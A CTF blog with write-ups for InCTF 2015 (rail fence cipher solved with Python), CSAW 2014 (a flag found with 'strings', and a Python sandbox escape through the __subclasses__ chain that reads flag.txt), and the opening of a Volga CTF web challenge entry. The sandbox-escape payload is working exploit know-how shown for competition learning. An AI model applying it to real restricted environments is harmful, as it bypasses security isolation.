## Sunday, 19 April 2015

### InCTF 2015 Qualification Crypto Writeup - Crypto1

Before even jumping to challenges, get to know a little about InCTF. Do read my previous blog post about InCTF.

There was totally 4 cryptography challenges, but writing write up only for crypto-1, 2 and 4 as I was not the developer/designer for crypto-3.

### Crypto1: 100 Points

Challenge:

I found this sheet lying on the railway tracks and it seems to be encrypted in some form. Can you reveal the right intended text?

```Text on sheet -

mgisd_fd_iuprhnedmfo5svqma_ureeer(eeeehl_sta_tYn__n_ustasyseoentenearlh)l_ar_ccxn-yclwsesnhodx_totib_i

```

Solution:

Looking at the cipher we can observe that it has only readable ascii character, so the characters are jumbled in some pattern or substituted with other characters.

There was hint in the Question itself: 'sheet lying in railway track'. So it might be Rail Fence Cipher aka ZigZag cipher.

Now the only challenge is to figure out the number of rails (key length) used in the cipher. Well it was easy brute forcible. Trying from 2-10 would have got the flag.

The key length was: 9

Plain text after decoding would be:
```Plain text:

md5(Yellow_ones_give_eastern_equipment_since_harsh_lunchboxes_understand_x-rated_measly_itchy_efforts)

```

So the Flag would be : 58a1b42e43bff262735766c384033fe6

Python code for Rail Fence Cipher or Zig-Zag cipher:

```def fence(lst, numrails):

fence = [[None] * len(lst) for n in range(numrails)]

rails = range(numrails - 1) + range(numrails - 1, 0, -1)

for n, x in enumerate(lst):

fence[rails[n % len(rails)]][n] = x

if 0: # debug

for rail in fence:

print ''.join('.' if c is None else str(c) for c in rail)

return [c for rail in fence for c in rail if c is not None]

def encode(text, n):

return ''.join(fence(text, n))

def decode(text, n):

rng = range(len(text))

pos = fence(rng, n)

return ''.join(text[pos.index(n)] for n in rng)

'''

Brute forcing through the keylength:

cipher = "mgisd_fd_iuprhnedmfo5svqma_ureeer(eeeehl_sta_tYn__n_ustasyseoentenearlh)l_ar_ccxn-yclwsesnhodx_totib_i"

print [decode(cipher, i) for i in range(2, 10)]

'''
```
Thanks for reading through the post.

## CSAW CTF 2014 Quals write-up

team r00t, we ended scoring 1250. None of the team members worked for more than half a day, and our team is small, containing 3 members. All lazy people :D

### Exploitation - 1: bo

This was a simple problem, or we didn't know how to solve in the way it was meant to be.
As usual as soon as we saw a executable follow the usual procedure -

First, file type

```> file bo

bo; ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

```
Second, look for strings-

```> strings bo

```
When we look at the strings. Oh wait is it the flag. Hell Yeah :D

```Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]

flag{exploitation_is_easy!}```

### Exploitation - 2: pybabbies

`nc 54.165.210.171 12345`

Connect the server with that particular port, We found python console showing up.
Afterwards we opened the source file

As we played around with the console
- Found its Python 3.x
- It does not show any returned value.
workaround: Just print the return value.
- Any error the execution will close the connection.

Time to analyse the source code. All the cool module and functions where banned :'(

Checked if there is already a variable with flag or key etc having the flag. And obviously it wasnt that easy. So, maybe there is a file with flag.txt or key.txt where the flag is and we have to open it.

Playing around with tuple. Ended with an interesting part -

```>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>```

Now its obvious try opening flag.txt key.txt etc

```>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>```

Welcome to my Python sandbox! Enter commands below!
```>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())

flag{definitely_not_intro_python}```

`>>> exit`

Thanks for reading through the write-up. If any thing wrong or can be added to this post. Please put them in the comments :)

## Saturday, 19 July 2014

### Volga CTF quals 2014

Team r00t managed only 700 points and secured 80th position

This was 1 really son of a difficult CTF

Web100-

If login successful, You will be given a particular phpsession.
Login was easy. you enter random name and it will get registered and access will be given.

After login in. In source we can see help.php

and refresh the loged in page.